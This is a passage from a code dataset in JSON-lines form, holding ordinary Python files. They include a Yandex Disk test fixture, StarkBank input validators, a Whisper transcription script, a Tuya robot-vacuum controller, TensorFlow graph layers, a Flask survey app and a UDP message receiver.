beginning_name = end_name\n\n if beginning_name == 0 and end_name != 0:\n disk.create_folder(path_to_folder)\n else:\n if beginning_name != 0:\n disk.create_folder(path_to_folder[0:end_name])\n\n yield path_to_folder\n end_name = 0\n beginning_name = 0\n\n for i in true_path:\n end_name += 1\n if i == \"/\":\n disk.delete_file_or_folder(path_to_folder[0:end_name-1])\n beginning_name = end_name\n break\n\n if beginning_name == 0 and end_name != 0:\n disk.delete_file_or_folder(path_to_folder)\n\n disk.empty_trash()\n\n\n@pytest.fixture(scope=\"function\", params=[\"catcat\"])\ndef new_file(request):\n disk = API()\n url = \"https://i.imgur.com/Ve9zZPX.jpg\"\n path_created_resource = request.param\n disk.upload_url(path_created_resource, url)\n\n yield path_created_resource\n disk.delete_file_or_folder(path_created_resource)\n disk.empty_trash()\n","repo_name":"17cyber17/yadi_disk_api_test","sub_path":"conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":2747,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23522921584","text":"from ellipticcurve import PrivateKey\nfrom datetime import datetime, date, timedelta\n\n\ndef check_environment(environment):\n from ..environment import Environment\n environments = Environment.values()\n assert environment in environments, \"Select a valid environment: {}\".format(\", \".join(environments))\n return environment\n\n\ndef check_private_key(pem):\n try:\n assert PrivateKey.fromPem(pem).curve.name == \"secp256k1\"\n except:\n raise Exception(\"Private-key must be valid secp256k1 ECDSA string in pem format\")\n return pem\n\n\ndef check_user(user):\n from ..user.__user import User\n assert isinstance(user, User), \"A user is required to access our API. Check our README: https://github.com/starkbank/sdk-python/\"\n return user\n\n\ndef check_language(language):\n accepted_languages = [\"en-US\", \"pt-BR\"]\n assert language in accepted_languages, \"Language must be one from {}\".format(accepted_languages)\n return language\n\n\ndef check_datetime_or_date(data):\n if data is None:\n return None\n\n if type(data) == datetime:\n return data\n\n if isinstance(data, date):\n return data\n\n data, dt_type = check_datetime_string(data)\n\n return data.date() if dt_type == date else data\n\n\ndef check_datetime(data):\n if data is None:\n return None\n\n if type(data) == datetime:\n return data\n\n if isinstance(data, date):\n return datetime(data.year, data.month, data.day)\n\n return check_datetime_string(data)[0]\n\n\ndef check_date(data):\n if data is None:\n return None\n\n if isinstance(data, datetime):\n return data.date()\n\n if isinstance(data, date):\n return data\n\n data, type = check_datetime_string(data)\n\n return data.date() if type == date else data\n\n\ndef check_timedelta(data):\n if data is None:\n return None\n\n if isinstance(data, timedelta):\n return data\n\n try:\n return timedelta(seconds=data)\n except:\n raise TypeError(\n \"invalid timedelta {data}, please use an integer in seconds or a datetime.timedelta object\".format(data=data)\n )\n\n\ndef check_datetime_string(data):\n data = str(data)\n\n try:\n return datetime.strptime(data, \"%Y-%m-%d\"), date\n except:\n pass\n\n try:\n return datetime.strptime(data, \"%Y-%m-%dT%H:%M:%S.%f+00:00\"), datetime\n except:\n pass\n\n try:\n return datetime.strptime(data, \"%Y-%m-%dT%H:%M:%S+00:00\"), datetime\n except:\n pass\n\n raise RuntimeError(\"invalid datetime string \" + data)\n","repo_name":"isaccanedo/sdk-python","sub_path":"starkbank/utils/checks.py","file_name":"checks.py","file_ext":"py","file_size_in_byte":2548,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"39307935735","text":"import whisper\nimport argparse\n\ndef getArgs(): \n\n parser = argparse.ArgumentParser(description='Process some integers.')\n parser.add_argument('--model', '-m', type=str, required=True)\n parser.add_argument('--audio', '-a', type=str, required=True)\n parser.add_argument(\"--filewrite\", '-f', action=\"store_true\")\n parser.add_argument('--filename', '-fn', type=str)\n return parser.parse_args()\n\n\ndef main(): \n args = getArgs()\n model = whisper.load_model(args.model)\n result = model.transcribe(args.audio)\n\n\n if (args.filewrite):\n file = open(args.filename, \"w\")\n file.write(result[\"text\"])\n file.close()\n\n else: \n print(result[\"text\"])\n\n\nif __name__ == '__main__':\n main()","repo_name":"Yalton/OpenAI_Whisper_Playground","sub_path":"whisper_transcribe.py","file_name":"whisper_transcribe.py","file_ext":"py","file_size_in_byte":733,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"32387130575","text":"import asyncio\nimport colorsys\nimport udi_interface\nimport time\nimport json\nfrom tuya_connector import (\n TuyaOpenAPI,)\n\n\nLOGGER = udi_interface.LOGGER\n\nclass RobvacNode(udi_interface.Node):\n def __init__(self, polyglot, primary, address, name, new_id, deviceid, apiAccessId, apiSecret, apiEndpoint, apiRegion):\n super(RobvacNode, self).__init__(polyglot, primary, address, name)\n self.poly = polyglot\n self.lpfx = '%s:%s' % (address, name)\n self.poly.subscribe(self.poly.START, self.start, address)\n self.poly.subscribe(self.poly.POLL, self.poll)\n self.new_id = new_id\n self.deviceid = deviceid\n self.DEVICEBOT_ID = deviceid\n self.apiAccessId = apiAccessId\n self.ACCESS_ID = apiAccessId\n self.apiSecret = apiSecret\n self.ACCESS_KEY = apiSecret\n self.apiEndpoint = apiEndpoint\n self.API_ENDPOINT = apiEndpoint\n self.apiRegion = apiRegion\n self.API_REGION = apiRegion\n self.SwStat(self)\n self.setDriver('ST', 1)\n \n # Robot On\n def setSwOn(self, command):\n API_ENDPOINT = self.API_ENDPOINT\n ACCESS_ID = self.ACCESS_ID\n ACCESS_KEY = self.ACCESS_KEY\n DEVICEBOT_ID = self.DEVICEBOT_ID\n openapi = TuyaOpenAPI(API_ENDPOINT, ACCESS_ID, ACCESS_KEY)\n openapi.connect()\n\n commands = {'commands': [{'code': 'power_go', 'value': True}]}\n openapi.post(\n '/v1.0/iot-03/devices/{}/commands'.format(DEVICEBOT_ID), commands)\n time.sleep(.5)\n self.setDriver('GV2', 1)\n #self.SwStat(self)\n\n # Robot Off\n def setSwOff(self, command):\n API_ENDPOINT = self.API_ENDPOINT\n ACCESS_ID = self.ACCESS_ID\n ACCESS_KEY = self.ACCESS_KEY\n DEVICEBOT_ID = self.DEVICEBOT_ID\n openapi = TuyaOpenAPI(API_ENDPOINT, ACCESS_ID, ACCESS_KEY)\n openapi.connect()\n \n commands = {'commands': [{'code': 'mode', 'value': 'chargego'}]}\n openapi.post(\n '/v1.0/iot-03/devices/{}/commands'.format(DEVICEBOT_ID), commands)\n time.sleep(.5)\n self.setDriver('GV2', 0)\n #self.SwStat(self)\n\n # Set Modes\n def modeOn(self, command):\n API_ENDPOINT = self.API_ENDPOINT\n ACCESS_ID = self.ACCESS_ID\n ACCESS_KEY = self.ACCESS_KEY\n DEVICEBOT_ID = self.DEVICEBOT_ID\n openapi = TuyaOpenAPI(API_ENDPOINT, ACCESS_ID, ACCESS_KEY)\n openapi.connect()\n self.modeOn = int(command.get('value'))\n self.setDriver('GV3', self.modeOn)\n # Charge\n if self.modeOn == 0:\n commands = {'commands': [{'code': 'mode', 'value': 'chargego'}]}\n openapi.post(\n '/v1.0/iot-03/devices/{}/commands'.format(DEVICEBOT_ID), commands)\n LOGGER.info('Charge')\n time.sleep(.5)\n self.SwStat(self)\n # Standby\n elif self.modeOn == 1:\n commands = {'commands': [{'code': 'mode', 'value': 'standby'}]}\n openapi.post(\n '/v1.0/iot-03/devices/{}/commands'.format(DEVICEBOT_ID), commands)\n LOGGER.info('Standby')\n time.sleep(.5)\n self.SwStat(self)\n # Spiral\n elif self.modeOn == 2:\n commands = {'commands': [{'code': 'mode', 'value': 'spiral'}]}\n openapi.post(\n '/v1.0/iot-03/devices/{}/commands'.format(DEVICEBOT_ID), commands)\n LOGGER.info('Spiral')\n time.sleep(.5)\n self.SwStat(self)\n # Wall Follow\n elif self.modeOn == 3:\n commands = {'commands': [{'code': 'mode', 'value': 'wall_follow'}]}\n openapi.post(\n '/v1.0/iot-03/devices/{}/commands'.format(DEVICEBOT_ID), commands)\n LOGGER.info('Wall Follow')\n time.sleep(.5)\n self.SwStat(self)\n # Random\n elif self.modeOn == 4:\n commands = {'commands': [{'code': 'mode', 'value': 'random'}]}\n openapi.post(\n '/v1.0/iot-03/devices/{}/commands'.format(DEVICEBOT_ID), commands)\n LOGGER.info('Random')\n time.sleep(.5)\n self.SwStat(self)\n # Partial Bow\n elif self.modeOn == 5:\n commands = {'commands': [{'code': 'mode', 'value': 'partial_bow'}]}\n openapi.post(\n '/v1.0/iot-03/devices/{}/commands'.format(DEVICEBOT_ID), commands)\n LOGGER.info('Partial Bow')\n time.sleep(.5)\n self.SwStat(self)\n else:\n pass\n\n # Manual Control\n def modeMan(self, command):\n API_ENDPOINT = self.API_ENDPOINT\n ACCESS_ID = self.ACCESS_ID\n ACCESS_KEY = self.ACCESS_KEY\n DEVICEBOT_ID = self.DEVICEBOT_ID\n openapi = TuyaOpenAPI(API_ENDPOINT, ACCESS_ID, ACCESS_KEY)\n openapi.connect()\n self.modeMan = int(command.get('value'))\n self.setDriver('GV7', self.modeMan)\n \n # Forward\n if self.modeMan == 0:\n commands = {'commands': [{'code': 'direction_control', 'value': 'forward'}]}\n openapi.post(\n '/v1.0/iot-03/devices/{}/commands'.format(DEVICEBOT_ID), commands)\n LOGGER.info('Forward')\n time.sleep(.5)\n self.SwStat(self)\n # Backward\n elif self.modeMan == 1:\n commands = {'commands': [{'code': 'direction_control', 'value': 'backward'}]}\n openapi.post(\n '/v1.0/iot-03/devices/{}/commands'.format(DEVICEBOT_ID), commands)\n LOGGER.info('Backwards')\n time.sleep(.5)\n self.SwStat(self)\n # Turn Left\n elif self.modeMan == 2:\n commands = {'commands': [{'code': 'direction_control', 'value': 'turn_left'}]}\n openapi.post(\n '/v1.0/iot-03/devices/{}/commands'.format(DEVICEBOT_ID), commands)\n LOGGER.info('Turn Left')\n time.sleep(.5)\n self.SwStat(self)\n # Turn Right\n elif self.modeMan == 3:\n commands = {'commands': [{'code': 'direction_control', 'value': 'turn_right'}]}\n openapi.post(\n '/v1.0/iot-03/devices/{}/commands'.format(DEVICEBOT_ID), commands)\n LOGGER.info('Turn Right')\n time.sleep(.5)\n self.SwStat(self)\n # Stop\n elif self.modeMan == 4:\n commands = {'commands': [{'code': 'power_go', 'value': False}]}\n openapi.post(\n '/v1.0/iot-03/devices/{}/commands'.format(DEVICEBOT_ID), commands)\n LOGGER.info('Stop')\n time.sleep(.5)\n self.SwStat(self)\n else:\n pass\n\n # Suction\n def modeSuc(self, command):\n API_ENDPOINT = self.API_ENDPOINT\n ACCESS_ID = self.ACCESS_ID\n ACCESS_KEY = self.ACCESS_KEY\n DEVICEBOT_ID = self.DEVICEBOT_ID\n openapi = TuyaOpenAPI(API_ENDPOINT, ACCESS_ID, ACCESS_KEY)\n openapi.connect()\n self.modeSuc = int(command.get('value'))\n self.setDriver('GV8', self.modeSuc)\n \n # Suction Gentle\n if self.modeSuc == 0:\n commands = {'commands': [{'code': 'suction', 'value': \"gentle\"}]}\n openapi.post(\n '/v1.0/iot-03/devices/{}/commands'.format(DEVICEBOT_ID), commands)\n LOGGER.info('Suction Gentle')\n time.sleep(.5)\n self.SwStat(self)\n # Suction Normal\n elif self.modeSuc == 1:\n commands = {'commands': [{'code': 'suction', 'value': \"normal\"}]}\n openapi.post(\n '/v1.0/iot-03/devices/{}/commands'.format(DEVICEBOT_ID), commands)\n LOGGER.info('Suction Normal')\n time.sleep(.5)\n self.SwStat(self)\n # Suction High\n elif self.modeSuc == 2:\n commands = {'commands': [{'code': 'suction', 'value': \"strong\"}]}\n openapi.post(\n '/v1.0/iot-03/devices/{}/commands'.format(DEVICEBOT_ID), commands)\n LOGGER.info('Suction High')\n time.sleep(.5)\n self.SwStat(self)\n else:\n pass\n\n def SwStat(self, command):\n API_ENDPOINT = self.API_ENDPOINT\n ACCESS_ID = self.ACCESS_ID\n ACCESS_KEY = self.ACCESS_KEY\n DEVICEBOT_ID = self.DEVICEBOT_ID\n openapi = TuyaOpenAPI(API_ENDPOINT, ACCESS_ID, ACCESS_KEY)\n openapi.connect()\n\n response1 = openapi.get(\n \"/v1.0/iot-03/devices/{}\".format(DEVICEBOT_ID) + \"/status/\")\n LOGGER.info(response1)\n for i in response1['result'][0:1]:\n # LOGGER.info(i['value'])\n if i['value'] == True:\n self.setDriver('GV2', 1)\n elif i['value'] == False:\n self.setDriver('GV2', 0)\n for i in response1['result'][4:5]:\n self.setDriver('GV5', i['value'])\n LOGGER.info('Battery %')\n for i in response1['result'][6:7]:\n self.setDriver('TIME', i['value'])\n LOGGER.info('Clean time')\n for i in response1['result'][3:4]:\n LOGGER.info(i['code'])\n LOGGER.info(i['value'])\n if i['value'] == 'standby':\n self.setDriver('GV4',0)\n elif i['value'] == 'smart_clean':\n self.setDriver('GV4',1)\n elif i['value'] == 'wall_clean':\n self.setDriver('GV4',2)\n elif i['value'] == 'spot_clean':\n self.setDriver('GV4',3)\n elif i['value'] == 'goto_charge':\n self.setDriver('GV4',4)\n elif i['value'] == 'charging':\n self.setDriver('GV4',5)\n elif i['value'] == 'charge_done':\n self.setDriver('GV4',6)\n elif i['value'] == 'charging':\n self.setDriver('GV4',5)\n elif i['value'] == 'cleaning':\n self.setDriver('GV4',7)\n elif i['value'] == 'sleep':\n self.setDriver('GV4',8)\n else:\n pass\n \n def poll(self, polltype):\n if 'longPoll' in polltype:\n LOGGER.debug('longPoll (node)')\n else:\n self.SwStat(self)\n self.query(self)\n LOGGER.debug('shortPoll (node)')\n\n def query(self, command=None):\n self.SwStat(self)\n self.reportDrivers()\n\n drivers = [\n {'driver': 'GV2', 'value': 0, 'uom': 25},\n {'driver': 'GV3', 'value': 0, 'uom': 25},\n {'driver': 'GV4', 'value': 0, 'uom': 25},\n {'driver': 'GV5', 'value': 0, 'uom': 51},\n {'driver': 'TIME', 'value': 0, 'uom': 56},\n {'driver': 'GV7', 'value': 0, 'uom': 25},\n {'driver': 'GV8', 'value': 0, 'uom': 25},\n {'driver': 'ST', 'value': 1, 'uom': 2},\n\n ]\n\n id = 'robvac'\n\n commands = {\n 'BOTON': setSwOn,\n 'BOTOF': setSwOff,\n 'MODE1': modeOn,\n 'MODEM': modeMan,\n 'MODES': modeSuc, \n 'QUERY': query,\n }\n","repo_name":"sjpbailey/udi-tuya-poly-robotvacuum-api-v3","sub_path":"nodes/tuya_robotvac_node.py","file_name":"tuya_robotvac_node.py","file_ext":"py","file_size_in_byte":10979,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"36527662028","text":"import sys\ninput = sys.stdin.readline\n\ntestCase = int(input())\n\ncandi=[[] for _ in range(testCase)]\n# print(candi)\nfor i in range(testCase):\n N = int(input())\n \n for j in range(N):\n candi[i].append(list(map(int, input().split())))\n # print(candi[i])\n ans = []\n candi[i].sort(key = lambda x: x[0])\n ans.append(candi[i][0])\n print('ans init =', ans)\n for k in range(1, len(candi[i])): # 서류 순위가 나보다 높은 사람보다 면접 점수가 높으면 된다.\n target = candi[i][k][1]\n print('target===========', candi[i][k]) \n for l in range(0, k):\n betterPaper = candi[i][l][1] # interview변수 보다 서류가 높은 사람과 비교할 면접 점수들\n print('betterPaper', candi[i][l])\n if target < betterPaper: # 나은 페이퍼를 쓴 사람보다 면접 순위가 높으면(수가 작으면)\n ans.append(candi[i][k])\n print('ans = ', ans)\n break\n print(len(ans))\n\n # print(candi[i])\n\n## 문제 이해를 잘못했다: 나보다 서류 순위가 높은 지원자들의 면접순위보다 제일 높아야 한다##\n# 테스트 케이스 반복도 두 번 나누어 저장하기 보다 그냥 반복문으로 반복하면 된다.\n\nimport sys\n\nt = int(sys.stdin.readline().strip())\nfor _ in range(t):\n n = int(sys.stdin.readline().strip())\n applied = [[int(x) for x in sys.stdin.readline().split()] for _ in range(n)]\n applied.sort()\n min_rank = applied[0][1]\n cnt = 1\n for i in range(n):\n rank = applied[i][1]\n if rank < min_rank:\n min_rank = rank\n cnt += 1\n print(cnt)","repo_name":"dearmysolitude/KJ01","sub_path":"04_DP_greedy/1946_신입사원.py","file_name":"1946_신입사원.py","file_ext":"py","file_size_in_byte":1682,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9243244775","text":"from deeprig.inits import *\nimport tensorflow.compat.v1 as tf\nimport numpy as np\nflags = tf.compat.v1.flags\nFLAGS = flags.FLAGS\n\n# global unique layer ID dictionary for layer name assignment\n_LAYER_UIDS = {}\n\n\ndef get_layer_uid(layer_name=''):\n \"\"\"Helper function, assigns unique layer IDs.\"\"\"\n if layer_name not in _LAYER_UIDS:\n _LAYER_UIDS[layer_name] = 1\n return 1\n else:\n _LAYER_UIDS[layer_name] += 1\n return _LAYER_UIDS[layer_name]\n\n\ndef dot(x, y, sparse=False):\n x = tf.cast(x, dtype=tf.float32)\n y = tf.cast(y, dtype=tf.float32)\n \"\"\"Wrapper for tf.matmul (sparse vs dense).\"\"\"\n if sparse:\n res = tf.sparse_tensor_dense_matmul(x, y)\n else:\n\n res = tf.matmul(x, y)\n return res\n\n\nclass Layer(object):\n \"\"\"Base layer class. Defines basic API for all layer objects.\n Implementation inspired by keras (http://keras.io).\n\n # Properties\n name: String, defines the variable scope of the layer.\n logging: Boolean, switches Tensorflow histogram logging on/off\n\n # Methods\n _call(inputs): Defines computation graph of layer\n (i.e. takes input, returns output)\n __call__(inputs): Wrapper for _call()\n _log_vars(): Log all variables\n \"\"\"\n\n def __init__(self, **kwargs):\n allowed_kwargs = {'name', 'logging'}\n for kwarg in kwargs.keys():\n assert kwarg in allowed_kwargs, 'Invalid keyword argument: ' + kwarg\n name = kwargs.get('name')\n if not name:\n layer = self.__class__.__name__.lower()\n name = layer + '_' + str(get_layer_uid(layer))\n self.name = name\n self.vars = {}\n logging = kwargs.get('logging', False)\n self.logging = logging\n self.sparse_inputs = False\n\n def _normalize(self, inputs, eps):\n raise NotImplementedError\n\n def _call(self, inputs):\n return inputs\n\n def __call__(self, inputs):\n with tf.name_scope(self.name):\n if self.logging and not self.sparse_inputs:\n tf.summary.histogram(self.name + '/inputs', inputs)\n outputs = self._call(inputs)\n if self.logging:\n tf.summary.histogram(self.name + '/outputs', outputs)\n return outputs\n\n def _log_vars(self):\n for var in self.vars:\n tf.summary.histogram(self.name + '/vars/' + var, self.vars[var])\n\n\nclass Encoder(Layer):\n \"\"\"Encoder layer.\"\"\"\n\n def __init__(self, input_dim, output_dim, gene_size, placeholders, dropout, act=tf.nn.relu, featureless=False, **kwargs):\n super(Encoder, self).__init__(**kwargs)\n\n self.act = act\n self.adj = placeholders['adjacency_matrix']\n self.featureless = featureless\n self.dropout = dropout\n\n with tf.variable_scope(self.name + '_vars'):\n self.vars['weight1'] = glorot([input_dim, output_dim])\n self.vars['weight2'] = glorot([gene_size, output_dim])\n\n if self.logging:\n self._log_vars()\n\n def _normalize(self, A, eps = 1e-6):\n n = tf.shape(A)[-1]\n A -= tf.linalg.diag(tf.linalg.diag_part(A))\n A_hat = A + tf.cast(tf.eye(n), dtype=A.dtype)[tf.newaxis, :, :]\n A_hat = tf.cast(A_hat, tf.float64)\n print(\"Data type of A:\", A.dtype)\n deg = tf.reduce_sum(A_hat, axis=2)\n deg = tf.cast(deg, tf.float64)\n\n D_symm = tf.linalg.diag(1./(eps + tf.math.sqrt(deg)))\n D_asymm = tf.linalg.diag(1./(eps + deg))\n print(D_symm.shape)\n print(A_hat.shape)\n\n normalize_adj = tf.matmul(tf.matmul(D_symm, A_hat), D_symm)\n normalize_adj = tf.squeeze(normalize_adj)\n print(normalize_adj.shape)\n\n def _call(self, inputs):\n # convolution\n if not self.featureless:\n x = inputs\n x = tf.nn.dropout(x, 1- self.dropout)\n pre_sup = dot(x, self.vars['weight1'])\n else:\n pre_sup = self.vars['weight1']\n\n # transform \n T = dot(self.adj, pre_sup)\n hidden = tf.add(T, self.vars['weight2'])\n return self.act(hidden)\n\n\nclass Decoder(Layer):\n \"\"\"Decoder layer.\"\"\"\n\n def __init__(self, size1, latent_factor_num, placeholders, act = tf.nn.sigmoid, **kwargs):\n super(Decoder, self).__init__(**kwargs)\n self.size1 = size1\n with tf.variable_scope(self.name + '_vars'):\n self.vars['weight3'] = glorot([latent_factor_num, latent_factor_num])\n\n def _call(self, hidden):\n M1 = dot(dot(hidden, self.vars['weight3']), tf.transpose(hidden))\n M1 = tf.reshape(M1, [-1, 1])\n return self.act(M1)\n","repo_name":"JChander/DeepRIG","sub_path":"deeprig/layers.py","file_name":"layers.py","file_ext":"py","file_size_in_byte":4637,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"5838692007","text":"import FWCore.ParameterSet.Config as cms\n\n#process = cms.Process(\"RPCPathChambFilter\")\n\nprocess = cms.Process(\"RPCSelectEventsForIlumination\")\nprocess.maxEvents = cms.untracked.PSet(\n input = cms.untracked.int32(-1)\n)\n\nprocess.selRPC = cms.EDFilter(\"RPCSelectEventsForIlumination\", \n rpcDTPoints = cms.InputTag(\"rpcPointProducer\",\"RPCDTExtrapolatedPoints\"),\n rpcCSCPoints = cms.InputTag(\"rpcPointProducer\",\"RPCCSCExtrapolatedPoints\"),\n)\n\nprocess.source = cms.Source(\"PoolSource\",\n# fileNames = cms.untracked.vstring('rfio:/castor/cern.ch/user/c/carrillo/PointProducer/119090/119090.B294A2F1-72C7-DE11-9B7F-000423D991D4.root')\n fileNames = cms.untracked.vstring('file:/tmp/carrillo/point119090.root')\n)\n\nprocess.FEVT = cms.OutputModule(\"PoolOutputModule\",\n outputCommands = cms.untracked.vstring('keep *'),\n SelectEvents = cms.untracked.PSet(\n SelectEvents = cms.vstring(\"selrpc\")\n ),\n fileName = cms.untracked.string('/tmp/carrillo/RE12.root')\n)\n\nprocess.selrpc = cms.Path(process.selRPC)\nprocess.outpath = cms.EndPath(process.FEVT)\n\n","repo_name":"camilocarrillo/UserCode","sub_path":"RPCSelectEventsForIlumination/rpcselecteventsforilumination.py","file_name":"rpcselecteventsforilumination.py","file_ext":"py","file_size_in_byte":1059,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27029215426","text":"from tkinter import *\n\nroot = Tk()\nroot.title(\"Driving license\")\nroot.geometry(\"500x400\")\n\nroot.configure(bg=\"white\")\ncanvas = Canvas(root, width=500, height=400)\ncanvas.create_rectangle(0, 0, 500, 80, fill=\"#bf2626\")\n\n\nlabel_heading = canvas.create_text(250, 50, font=(\"Times\", \"24\", \"bold italic\"), fill=\"white\", text=\"Driving license\")\nlabel_id_tag = canvas.create_text(40, 100, font=(\"Times\", \"18\", \"bold\"), text=\"ID: \")\nlabel_name_tag = canvas.create_text(40, 165, font=(\"Times\", \"16\", \"bold\"), text=\"Name: \")\nlabel_dob_tag = canvas.create_text(40, 205, font=(\"Times\", \"16\", \"bold\"), text=\"DOB: \")\nlabel_pin_tag = canvas.create_text(40, 250, font=(\"Times\", \"16\", \"bold\"), text=\"Pin: \")\n\nlabel_id = Label(root)\nlabel_name = Label(root)\nlabel_dob = Label(root)\nlabel_pin = Label(root)\n\ndef myCardDetails():\n id = 1113331\n print(type(id))\n name = \"Mrityunjay\"\n print(type(name))\n dob = \"5th August\"\n print(type(dob))\n pin = \"300110\"\n print(type(pin))\n\n label_id['text'] = id\n label_name['text'] = name\n label_dob['text'] = dob\n label_pin['text'] = pin\n\n\nbutton_1 = Button(root, command=myCardDetails, bg=\"yellow\", text=\"Show license details\")\nbutton_1.configure(width=20, activebackground=\"#bf2626\", relief=FLAT)\n\nbutton_1_window = canvas.create_window(150, 330, anchor=CENTER, window=button_1)\nlabel_id_window = canvas.create_window(100, 100, anchor=CENTER, window=label_id)\nlabel_name_window = canvas.create_window(120, 165, anchor=CENTER, window=label_name)\nlabel_dob_window = canvas.create_window(120, 205, anchor=CENTER, window=label_dob)\nlabel_pin_window = canvas.create_window(110, 255, anchor=CENTER, window=label_pin)\ncanvas.pack()\n\nroot.mainloop()\n","repo_name":"jyotiraditya09/label","sub_path":"label_license.py","file_name":"label_license.py","file_ext":"py","file_size_in_byte":1696,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"34878944776","text":"from flask import Flask, render_template, request, redirect, url_for\r\nfrom sqlalchemy import func\r\nfrom flask_sqlalchemy import SQLAlchemy\r\nimport sqlite3\r\n\r\nlist_of_questions = [(\"вам нравятся русские буквы?\",), (\"вам нравятся латинские буквы?\",)]\r\n\r\ndb = sqlite3.connect(r'test.db')\r\ncur = db.cursor()\r\n\r\n\r\ncur.execute(\r\n \"\"\"CREATE TABLE answers (\r\n id INTEGER PRIMARY KEY AUTOINCREMENT,\r\n q1 INTEGER,\r\n q2 INTEGER )\r\n \"\"\")\r\n\r\ncur.execute(\r\n \"\"\"CREATE TABLE questions (\r\n id INTEGER PRIMARY KEY AUTOINCREMENT,\r\n text TEXT\r\n )\"\"\")\r\n\r\n\r\ncur.execute(\r\n \"\"\"CREATE TABLE\r\n user ( \r\n id INTEGER PRIMARY KEY AUTOINCREMENT,\r\n gender TEXT,\r\n education TEXT,\r\n age INTEGER )\"\"\")\r\n\r\nfor smth in list_of_questions:\r\n cur.execute(\r\n '''INSERT into questions (text) VALUES (?) ''', smth\r\n )\r\n\r\ndb.commit()\r\n\r\napp = Flask(__name__)\r\napp.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///test.db'\r\ndb = SQLAlchemy(app)\r\n\r\nclass User(db.Model):\r\n __tablename__ = 'user' # имя таблицы\r\n id = db.Column(db.Integer, primary_key=True) # имя колонки = специальный тип (тип данных, первичный ключ)\r\n gender = db.Column(db.Text)\r\n education = db.Column(db.Text)\r\n age = db.Column(db.Integer)\r\n\r\n\r\nclass Questions(db.Model):\r\n __tablename__ = 'questions'\r\n id = db.Column(db.Integer, primary_key=True)\r\n text = db.Column(db.Text)\r\n\r\n\r\nclass Answers(db.Model):\r\n __tablename__ = 'answers'\r\n id = db.Column(db.Integer, primary_key=True)\r\n q1 = db.Column(db.Integer)\r\n q2 = db.Column(db.Integer)\r\n\r\n@app.route('/')\r\ndef base():\r\n with open(\"intro.txt\", \"r\", encoding='utf-8') as f:\r\n content = f.read().split('\\n')\r\n return render_template(\"base.html\", content=content)\r\n\r\n@app.route('/questions')\r\ndef question_page():\r\n questions = Questions.query.all() # имя_таблицы.query.взять_все()\r\n return render_template(\r\n 'questions.html',\r\n questions=questions\r\n )\r\n\r\n\r\n@app.route('/process', methods=['get'])\r\ndef answer_process():\r\n # если пустой запрос, то отправить проходить анкету\r\n if not request.args:\r\n return redirect(url_for('question_page'))\r\n\r\n # получаем значения ответов\r\n gender = request.args.get('gender')\r\n education = request.args.get('education')\r\n age = request.args.get('age')\r\n\r\n # записываем в базу\r\n user = User(\r\n age=age,\r\n gender=gender,\r\n education=education\r\n )\r\n db.session.add(user)\r\n db.session.commit()\r\n\r\n # обновляем user'a, чтобы его ответ записать с таким же id\r\n db.session.refresh(user)\r\n\r\n # это же делаем с ответом\r\n q1 = request.args.get('q1')\r\n q2 = request.args.get('q2')\r\n answer = Answers(\r\n id=user.id,\r\n q1=q1,\r\n q2=q2\r\n )\r\n db.session.add(answer)\r\n db.session.commit()\r\n\r\n return 'спасибо! за участие'\r\n\r\n\r\n@app.route('/stats')\r\ndef stats():\r\n # заводим словарь для значений (чтобы не передавать каждое в render_template)\r\n all_info = {}\r\n\r\n age_stats = db.session.query(\r\n func.avg(User.age), # средний возраст AVG(user.age)\r\n func.min(User.age), # минимальный возраст MIN(user.age)\r\n func.max(User.age) # максимальный возраст MAX(user.age)\r\n ).one() # берем один результат (он всего и будет один)\r\n\r\n all_info['age_mean'] = age_stats[0]\r\n all_info['age_min'] = age_stats[1]\r\n all_info['age_max'] = age_stats[2]\r\n\r\n # это простой запрос, можно прямо у таблицы спросить\r\n all_info['total_count'] = User.query.count() # SELECT COUNT(age) FROM user\r\n\r\n # SELECT AVG(q1) FROM answers\r\n all_info['q1_mean'] = db.session.query(func.avg(Answers.q1)).one()[0]\r\n\r\n # SELECT q1 FROM answers\r\n q1_answers = db.session.query(Answers.q1).all()\r\n\r\n # SELECT AVG(q1) FROM answers\r\n all_info['q2_mean'] = db.session.query(func.avg(Answers.q2)).one()[0]\r\n\r\n # SELECT q1 FROM answers\r\n q2_answers = db.session.query(Answers.q2).all()\r\n\r\n return render_template('results.html', all_info=all_info)\r\nif __name__ == '__main__':\r\n app.run()","repo_name":"tpeyrolnik/letters_app","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4513,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"75382340648","text":"# __author__ = 'Deliang Yang'\n# __create__ = '2018.01.11'\n\nimport socket\n\nUDP_IP = '127.0.0.1'\nUDP_PORT = 9234\n\ndef run():\n SUM = 0\n sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n sock.bind(('', UDP_PORT))\n counter = 0\n random = ''\n\n while True:\n SUM +=1\n data, addr = sock.recvfrom(1024)\n msg = str(data,encoding = 'utf-8')\n sum = int(msg[0:3])\n number = int(msg[4:7])\n\n if msg[8:11] != random:\n counter = 1\n else:\n counter +=1\n if len(data)<16:\n print('=============')\n print('Rcv msg:', msg, '\\n--from', addr, 'Len:',len(data))\n else:\n print('Rcv msg:', msg[0:17] ,'\\n--from', addr, 'Len:', len(data))\n print('Total:',sum,'\\tIndex:',number,'\\tPercent:', (counter/sum*100),'%')\n print('--No.%d'%SUM)\n print('===========================================')\n random = msg[8:11]\n# sock.sendto(MSG, (UDP_IP, UDP_PORT))\n\nif __name__ == '__main__':\n 